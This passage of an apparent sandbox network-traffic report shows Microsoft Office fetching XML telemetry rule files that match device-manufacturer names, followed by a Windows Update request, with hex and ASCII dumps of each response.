2024-11-04 16:31:26 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	49751	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:27 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:27 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163127Z-16547b76f7fmbrhqhC1DFWkds800000003v000000000sv0e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	49752	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:27 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:27 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 80fffc35-b01e-0002-7355-2e1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163127Z-176bd8f9bc5wvvmqhC1DFWsr0w0000000150000000008g5t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:27 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:28 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:28 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 9b119710-001e-0014-385c-2e5151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163128Z-176bd8f9bc56w2rshC1DFWd88n00000005n000000000h9e7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:28 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:28 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:28 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:28 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163128Z-16547b76f7fr4g8xhC1DFW9cqc0000000350000000003wqb x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:28 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.5	49754	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:28 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:28 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163128Z-16547b76f7ftdm8dhC1DFWs13g00000003yg000000001x52 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	49755	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:28 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:29 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 34624292-801e-0047-3c58-2e7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163129Z-15869dbbcc6khw88hC1DFWh5f400000003yg000000000bw9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:29 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	49756	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:28 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:29 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: bbcd7168-d01e-002b-5940-2e25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163129Z-15869dbbcc662ldwhC1DFW5zvg00000003pg00000000da09 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:29 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	49757	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:29 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:29 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:29 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 11f32c1c-b01e-003d-4c5c-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163129Z-15869dbbcc6pfq2ghC1DFW0bk000000003rg00000000cgt0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:29 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.5	49760	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:29 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:29 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:29 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163129Z-16547b76f7fkcrm9hC1DFWxdag0000000410000000009fce x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:29 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:29 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:30 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:29 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163129Z-16547b76f7fcjqqhhC1DFWrrrc00000003y0000000005r5n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:30 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:29 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:30 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:30 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163130Z-16547b76f7fcjqqhhC1DFWrrrc00000003tg00000000qpr2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:30 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49758	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:30 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5x1TTNvoAxBWSo2&MD=oay1reMr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
